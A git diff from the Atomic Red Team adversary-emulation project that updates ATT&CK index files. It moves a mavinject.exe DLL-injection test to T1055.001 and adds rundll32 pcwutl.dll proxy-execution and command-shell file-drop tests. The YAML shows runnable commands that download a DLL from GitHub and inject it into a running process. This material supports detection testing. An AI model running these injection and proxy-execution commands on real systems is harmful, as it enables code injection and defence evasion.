T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] @@ -895,6 +895,7 @@ - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] + - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1349,6 +1350,7 @@ - Atomic Test #3: Extract Memory via VBA [windows] - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] + - Atomic Test #2: Writes text to a file and displays it. [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c4604cbe31..de3db12a7c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -186,7 +186,8 @@ - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -226,9 +227,8 @@ - Atomic Test #1: Process Hollowing using PowerShell [windows] - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] - - Atomic Test #2: Shellcode execution via VBA [windows] - - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] - Atomic Test #2: Reg Key RunOnce [windows] @@ -365,7 +365,8 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -485,9 +486,8 @@ - Atomic Test #1: Process Hollowing using PowerShell [windows] - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] - - Atomic Test #2: Shellcode execution via VBA [windows] - - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -523,6 +523,7 @@ - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] + - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1011,6 +1012,7 @@ - Atomic Test #3: Extract Memory via VBA [windows] - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] + - Atomic Test #2: Writes text to a file and displays it. [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 0a1e5634d6..0a422945b0 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -27,7 +27,7 @@ | | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | @@ -39,7 +39,7 @@ | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | | | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 16426f0859..732bd8edfe 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -22,13 +22,13 @@ | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | | | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | | | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 52b1339482..353a707908 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2672,7 +2672,43 @@ privilege-escalation: x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1055.001 + atomic_tests: + - name: Process Injection via mavinject.exe + auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + description: | + Windows 10 Utility To Inject DLLS. + + Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. + With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + supported_platforms: + - windows + input_arguments: + process_id: + description: PID of input_arguments + type: Integer + default: "(Start-Process notepad -PassThru).id" + dll_payload: + description: DLL to Inject + type: Path + default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll + dependency_executor_name: powershell + dependencies: + - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) + +' + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" + executor: + command: | + $mypid = #{process_id} + mavinject $mypid /INJECTRUNNING #{dll_payload} + name: powershell + elevation_required: true T1548.004: technique: external_references: @@ -5901,41 +5937,6 @@ privilege-escalation: x_mitre_is_subtechnique: false identifier: T1055 atomic_tests: - - name: Process Injection via mavinject.exe - auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - description: | - Windows 10 Utility To Inject DLLS. - - Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. - With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - supported_platforms: - - windows - input_arguments: - process_id: - description: PID of input_arguments - type: Integer - default: "(Start-Process notepad -PassThru).id" - dll_payload: - description: DLL to Inject - type: Path - default: PathToAtomicsFolder\T1055\src\x64\T1055.dll - dependency_executor_name: powershell - dependencies: - - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - -' - prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" - executor: - command: | - $mypid = #{process_id} - mavinject $mypid /INJECTRUNNING #{dll_payload} - name: powershell - elevation_required: true - name: Shellcode execution via VBA auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 description: | @@ -30160,7 +30161,43 @@ defense-evasion: x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1055.001 + atomic_tests: + - name: Process Injection via mavinject.exe + auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + description: | + Windows 10 Utility To Inject DLLS. + + Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. + With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + supported_platforms: + - windows + input_arguments: + process_id: + description: PID of input_arguments + type: Integer + default: "(Start-Process notepad -PassThru).id" + dll_payload: + description: DLL to Inject + type: Path + default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll + dependency_executor_name: powershell + dependencies: + - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) + +' + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" + executor: + command: | + $mypid = #{process_id} + mavinject $mypid /INJECTRUNNING #{dll_payload} + name: powershell + elevation_required: true T1548.004: technique: external_references: @@ -37252,41 +37289,6 @@ defense-evasion: x_mitre_is_subtechnique: false identifier: T1055 atomic_tests: - - name: Process Injection via mavinject.exe - auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - description: | - Windows 10 Utility To Inject DLLS. - - Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. - With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - supported_platforms: - - windows - input_arguments: - process_id: - description: PID of input_arguments - type: Integer - default: "(Start-Process notepad -PassThru).id" - dll_payload: - description: DLL to Inject - type: Path - default: PathToAtomicsFolder\T1055\src\x64\T1055.dll - dependency_executor_name: powershell - dependencies: - - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - -' - prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" - executor: - command: | - $mypid = #{process_id} - mavinject $mypid /INJECTRUNNING #{dll_payload} - name: powershell - elevation_required: true - name: Shellcode execution via VBA auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 description: | @@ -39100,6 +39102,24 @@ defense-evasion: rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs name: command_prompt + - name: Launches an executable using Rundll32 and pcwutl.dll + auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + description: 'Executes the LaunchApplication function in pcwutl.dll to proxy + execution of an executable. + +' + supported_platforms: + - windows + input_arguments: + exe_to_launch: + description: Path of the executable to launch + type: path + default: "%windir%\\System32\\notepad.exe" + executor: + command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} + +' + name: command_prompt T1134.005: technique: external_references: @@ -55503,6 +55523,31 @@ execution: ' name: powershell + - name: Writes text to a file and displays it. + auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e + description: 'Writes text to a file and display the results. This test is intended + to emulate the dropping of a malicious file to disk. + +' + supported_platforms: + - windows + input_arguments: + file_contents_path: + description: Path to the file that the command prompt will drop. + type: path + default: "%TEMP%\\test.bin" + message: + description: Message that will be written to disk and then displayed. + type: string + default: Hello from the Windows Command Prompt! + executor: + command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" + +' + cleanup_command: 'del "#{file_contents_path}" + +' + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md new file mode 100644 index 0000000000..09391906da --- /dev/null +++ b/atomics/T1055.001/T1055.001.md @@ -0,0 +1,62 @@ +# T1055.001 - Dynamic-link Library Injection +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/001) +
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. + +DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) + +Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) + +Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
+ +## Atomic Tests + +- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe) + + +
